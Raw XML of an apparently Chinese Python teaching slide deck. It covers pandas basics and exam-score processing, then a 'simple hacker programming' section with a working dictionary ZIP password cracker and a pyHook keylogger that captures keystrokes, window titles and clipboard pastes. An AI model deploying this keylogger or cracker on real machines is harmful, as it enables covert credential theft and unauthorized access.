            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="04AEDA"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="04AED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Series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560313" y="193675"/>
            <a:ext cx="2555875" cy="40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Pandas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755576" y="3075806"/>
            <a:ext cx="1512168" cy="792088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="04AEDA"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="04AED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DataFrame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776" y="1379038"/>
            <a:ext cx="589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用于存储一行或一列数据，列表很像，区别有索引</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>s1=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pandas.Series</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>( ['I', 'am', '18'])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>s2=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pandas.Series</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>( ['I', 'am', '18'], index=['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>s','v','p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>'] 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555776" y="2986566"/>
            <a:ext cx="614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用于存储多行和多列的数据集合，相当于表格</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>p1=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pd.DataFrame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>( {'name':['n1','n2','n3'], 'age':['11','22','33']} )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>p2=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pd.DataFrame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>( {'name':['m1','m2','m3'],'age':['44','55','66']} ,index=['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>one','two','three</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>']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43704"/>
            <a:ext cx="340224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处理数据案例代码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771550"/>
            <a:ext cx="8343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dftxt=pd.read_table(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班级高考成绩.txt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,sep=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,encoding=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gbk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dftxt=dftxt.drop_duplicates()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去除重复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dftxt.reindex(np.arange(dftxt.index.size))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重建行索引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dftxt[dftxt==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缺考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]=0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去掉杂数据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dftxt.iloc[:,1:]=dftxt.iloc[:,1:].astype(int)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表格数据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转换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dftxt[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总分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]=dftxt.iloc[:,1:].apply(lambda x:x.sum(),axis=1)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dftxt.loc[dftxt.index.size]=dftxt.iloc[:,1:].apply(lambda x:x.sum()/dftxt.index.size,axis=0)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dftxt.iloc[dftxt.index.size-1,0]=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平均分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dfcsv=dftxt.to_csv(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成绩统计.csv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,index=False,header=True)</a:t>
            </a:r>
          </a:p>
          <a:p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print(dftxt[ (dftxt[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语文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]&gt;123) &amp; (dftxt[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语文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]&lt;128) ])</a:t>
            </a:r>
          </a:p>
          <a:p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dftxt.describe()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9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牛皮纸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3812" r="3680" b="4240"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm rot="21251838">
            <a:off x="3818276" y="1899685"/>
            <a:ext cx="3710701" cy="22672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61591" y="176582"/>
            <a:ext cx="258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简单黑客编程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28802" y="1117470"/>
            <a:ext cx="5891470" cy="2881879"/>
            <a:chOff x="1128802" y="1117470"/>
            <a:chExt cx="5891470" cy="2881879"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4572000" y="2433145"/>
              <a:ext cx="24482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dirty="0">
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ZIP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>密码爆破</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea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zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea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+mn-ea"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>密码大盗</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49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6" r="14066"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1128802" y="1141849"/>
              <a:ext cx="2355151" cy="2857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18476" y="1117470"/>
              <a:ext cx="1015663" cy="15982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>
                  <a:latin typeface="华康娃娃体W5" panose="040B0509000000000000" pitchFamily="81" charset="-122"/>
                  <a:ea typeface="华康娃娃体W5" panose="040B0509000000000000" pitchFamily="81" charset="-122"/>
                </a:rPr>
                <a:t>黑客是黑的</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华康娃娃体W5" panose="040B0509000000000000" pitchFamily="81" charset="-122"/>
                <a:ea typeface="华康娃娃体W5" panose="040B0509000000000000" pitchFamily="81" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:latin typeface="华康娃娃体W5" panose="040B0509000000000000" pitchFamily="81" charset="-122"/>
                  <a:ea typeface="华康娃娃体W5" panose="040B0509000000000000" pitchFamily="81" charset="-122"/>
                </a:rPr>
                <a:t>   </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:latin typeface="华康娃娃体W5" panose="040B0509000000000000" pitchFamily="81" charset="-122"/>
                  <a:ea typeface="华康娃娃体W5" panose="040B0509000000000000" pitchFamily="81" charset="-122"/>
                </a:rPr>
                <a:t>还是白的？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99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563638"/>
            <a:ext cx="2257983" cy="2508870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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12793" y="154543"/>
            <a:ext cx="28595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爆破</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ZIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>密码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="213965" y="629331"/>
            <a:ext cx="6419447" cy="381642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-*- coding: utf-8 -*-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zipfile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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extractFile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toPath,zFile,password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zFile.extractall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(path=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toPath,pwd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=password);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print('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SCUCESS'+password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password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Exception as e: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print(e)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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zFile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zipfile.ZipFile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("E:/pythonWorkspace/demo/mymain/file/demo.zip")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passFile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open('E:/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pythonWorkspace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/demo/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mymain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/file/DICT.TXT')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line in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passFile.readlines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password =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line.strip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('\n');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 = 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extractFile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("E:/pythonWorkspace/demo/mymain/file/",zFile,password)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ret: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print('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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SCUCESS'+password</a:t>
            </a:r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exit(0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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__name__=='__main__':</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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main()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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t="19760" r="16150" b="24801"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7271065" y="2427734"/>
            <a:ext cx="680475" cy="43305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093947" y="182093"/>
            <a:ext cx="19658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defRPr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键盘密码大盗</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322908" y="593253"/>
            <a:ext cx="4646067" cy="41177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dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ctypes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> import *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import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pythoncom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pyHook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ;import win32clipboard</a:t>
            </a:r>
          </a:p>
          <a:p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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user32 = windll.user32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kernel32 = windll.kernel32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>psapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>windll.psapi</a:t>
            </a:r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 err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>current_window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = None</a:t>
            </a:r>
          </a:p>
          <a:p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 err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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get_current_process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>():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hwnd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = user32.GetForegroundWindow() # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>获取前台窗口句柄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pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c_ulong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(0) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>获得进程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID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 user32.GetWindowThreadProcessId(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hwnd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>byref</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)) 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process_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = "%d" % </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pid.value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>保存当前进程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID </a:t>
            </a:r>
          </a:p>
          <a:p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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> executable = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>create_string_buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("\x00" * 512) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>申请内存</a:t>
            </a:r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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>打开进程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h_process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = kernel32.OpenProcess(0x400 | 0x10, False, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRP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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>获取进程所对应的可执行文件的名字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psapi.GetModuleBaseNameA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>h_process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, None, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>byref</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(executable),512)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 err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>window_title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>create_string_buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("\x00" * 512) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>读取窗口标题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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>length = user32.GetWindowTextA(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hwnd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>byref</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>window_title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>), 512)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> print "\n[ PID: %s - %s - %s]\n" % (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>process_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>executable.value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>window_title.value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> kernel32.CloseHandle(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hwnd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>关闭句柄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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kernel32.CloseHandle(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>h_process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty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7AF7DB-0C7C-45C8-B2B8-E1FF85EBDE67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5436096" y="583076"/>
            <a:ext cx="3314427" cy="41177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dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>def keyStore(event):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global current_window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# 检查目标是否切换了窗口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if event.WindowName != current_window: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current_window = event.WindowName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get_current_process()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# 检测按键是否为常规按键(非组合键等)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if event.Ascii &gt; 32 and event.Ascii &lt; 127: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print chr(event.Ascii),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else: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# 若输入为[CTRL-V],则获取剪切板内容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if event.Key == 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V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win32clipboard.OpenClipboard()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pasted_value = win32clipboard.GetClipboardData()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win32clipboard.CloseClipboard()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print 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[PASTE] - %s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 % (pasted_value),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 else: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print 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[%s]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> % event.Key,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 return True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t># 创建和注册钩子函数管理器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k1 =pyHook.HookManager()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k1.KeyDown = keyStore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# 注册键盘记录的钩子，然后永久执行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k1.HookKeyboard()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
